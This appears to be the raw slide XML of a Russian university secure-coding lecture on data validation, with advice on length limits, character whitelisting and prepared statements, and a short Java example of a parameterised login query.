          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B93B0763-A673-4EA1-86C2-28A135B3362E}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr>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5612EA29-7AD3-4111-90CB-B7CE0A22E3F2}" type="datetime1">
              <a:rPr lang="ru-RU"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>13.10.2017</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D5B07758-23C3-4D24-B073-7DE2C8DC611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5FB8583-A804-4888-9174-7AB3F3C07E81}" type="datetime1">
              <a:rPr lang="ru-RU"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>13.10.2017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5C77176-6D70-4AE1-867F-93FF3FBE1FB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38DF87F-B57F-43DD-960B-E00063E9E64D}" type="datetime1">
              <a:rPr lang="ru-RU"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>13.10.2017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D58794D-BC39-4B28-9519-29F1DDB23D0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0877BA3-3E61-44FD-8BE4-5C9E743BB260}" type="datetime1">
              <a:rPr lang="ru-RU"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>13.10.2017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1D55DC0-FCCE-4AF4-BAA8-3D6431F83ED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CA8FC655-0D65-48D1-BA51-13C038E5D22E}" type="datetime1">
              <a:rPr lang="ru-RU"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>13.10.2017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CD326D1-946E-421B-BFC7-9F4516F8128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9CE61E3-3592-4D40-8A34-02EB9220EB30}" type="datetime1">
              <a:rPr lang="ru-RU"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>13.10.2017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2E141A8-575C-4C59-BBCE-8F56A0C60D8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B906B638-95C7-46DD-B245-CF1C3759832F}" type="datetime1">
              <a:rPr lang="ru-RU"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>13.10.2017</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BA04F46D-5B55-4CD2-BF08-430340A5CC12}"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E8375771-6B5E-42B8-A26A-2CACAC783702}" type="datetime1">
              <a:rPr lang="ru-RU"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>13.10.2017</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A8520BD-B00C-4597-9404-B3F7E7A98B7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D1E21F74-6300-4DF7-9C19-8989F99EBC43}" type="datetime1">
              <a:rPr lang="ru-RU"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>13.10.2017</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D284E7D-D3E0-4ED3-A8DF-C310CDD30C5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5A5E33A-AE92-4450-9BCD-55293813357B}" type="datetime1">
              <a:rPr lang="ru-RU"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>13.10.2017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C2A1515-C54A-4731-B779-B80AE97CE4D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DC3302BF-ACFF-4A9F-AA58-54CB2139746E}" type="datetime1">
              <a:rPr lang="ru-RU"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>13.10.2017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2E6F7A2-F844-425B-8FE9-4665FA964BA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4FB785F6-0B8A-42EC-A8ED-9F59B0EC5A1E}" type="datetime1">
              <a:rPr lang="ru-RU"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>13.10.2017</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9F473373-78CC-4E56-A986-95892E6FA45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67" r:id="rId1"/>
    <p:sldLayoutId id="2147484659" r:id="rId2"/>
    <p:sldLayoutId id="2147484660" r:id="rId3"/>
    <p:sldLayoutId id="2147484661" r:id="rId4"/>
    <p:sldLayoutId id="2147484668" r:id="rId5"/>
    <p:sldLayoutId id="2147484669" r:id="rId6"/>
    <p:sldLayoutId id="2147484662" r:id="rId7"/>
    <p:sldLayoutId id="2147484663" r:id="rId8"/>
    <p:sldLayoutId id="2147484664" r:id="rId9"/>
    <p:sldLayoutId id="2147484665" r:id="rId10"/>
    <p:sldLayoutId id="2147484666" r:id="rId11"/>
  </p:sldLayoutIdLst>
  <p:hf sldNum="0" hdr="0" ft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hyperlink" Target="http://upload.wikimedia.org/wikipedia/en/4/4f/Stack_Overflow_2.pn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hyperlink" Target="http://upload.wikimedia.org/wikipedia/en/9/93/Stack_Overflow_3.pn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hyperlink" Target="http://upload.wikimedia.org/wikipedia/en/4/4f/Stack_Overflow_2.pn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hyperlink" Target="http://upload.wikimedia.org/wikipedia/en/c/c3/Stack_Overflow_4.png"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7.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.pn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0.gif"/></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pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="D:\Documents and Settings\Admin\Рабочий стол\СПбГУТ.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="428625" y="714356"/>
            <a:ext cx="3143250" cy="596900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 3" descr="D:\Documents and Settings\Admin\Рабочий стол\с1.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3857625" y="714356"/>
            <a:ext cx="160338" cy="744537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 4" descr="D:\Documents and Settings\Admin\Рабочий стол\С2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4000500" y="571481"/>
            <a:ext cx="209550" cy="960437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 5" descr="D:\Documents and Settings\Admin\Рабочий стол\С3.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4214813" y="428606"/>
            <a:ext cx="214312" cy="1285875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Прямоугольник 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3857625"/>
            <a:ext cx="9144000" cy="3000375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent2"/>
              </a:gs>
              <a:gs pos="50000">
                <a:schemeClr val="accent2"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:tint val="23500"/>
                  <a:satMod val="160000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="189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9" name="Рисунок 8" descr="emblem-1.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="142844" y="1571612"/>
            <a:ext cx="1545805" cy="2071678"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 12" descr="C:\Users\Igor.ZSS\Downloads\Logo_ENGENSEC_365х103.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1785918" y="2928934"/>
            <a:ext cx="2405062" cy="679450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 13" descr="C:\Users\Igor.ZSS\Downloads\eu_flag_tempus.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1928794" y="1643050"/>
            <a:ext cx="2633662" cy="1023937"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Title 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="759136" y="4225727"/>
            <a:ext cx="7772400" cy="1362075"/>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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data Validation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0810B8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676256" y="3879736"/>
            <a:ext cx="7772400" cy="701671"/>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n-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security Mechanism:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="15" name="Table 12"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="294675277"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6588224" y="486362"/>
          <a:ext cx="2438400" cy="3122022"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2438400"/>
              </a:tblGrid>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Authentication</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRP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Authorization</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Session Management</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Data Validation</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>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Error Handling</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Logging</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Encryption</a:t>
                      </a:r>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81000"/>
            <a:ext cx="81534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Real World – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HBGary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Federal vs. Anonymous</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467544" y="1182811"/>
            <a:ext cx="6172200" cy="2847975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="391344" y="3316411"/>
            <a:ext cx="6248400" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050"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0638" y="4203515"/>
            <a:ext cx="2756062" cy="15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946"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Secure Coding …</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-946" y="1182811"/>
            <a:ext cx="7696200" cy="50371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1200"/>
              </a:spcAf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Restrict length  (username doesn't need to be 100 chars long)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAf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Whitelist characters  (only allow a-z and A-Z for username)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>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Use prepared statements</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="133350" y="2564904"/>
            <a:ext cx="8153400" cy="3809372"/>
            <a:chOff x="457200" y="2667000"/>
            <a:chExt cx="8153400" cy="3505203"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rounded Rectangle 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="457200" y="2667002"/>
              <a:ext cx="8153400" cy="3505201"/>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>   </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>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"user"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>2   </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>if</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>strUser.length</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> &gt; 100) error();</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>   </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>if</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>strUser.matches</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"^[a-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>zA</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-Z]+$"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>) == </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>false</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>) error();</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>5</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>   </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>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"SELECT * FROM users</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>6                      WHERE username = ?</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>7                      AND password = ?"</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8</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>9   </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>PreparedStatement</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stmnt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>null</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10  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>stmnt</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db_connection.prepareStatment</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</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11  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>stmnt.setString</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
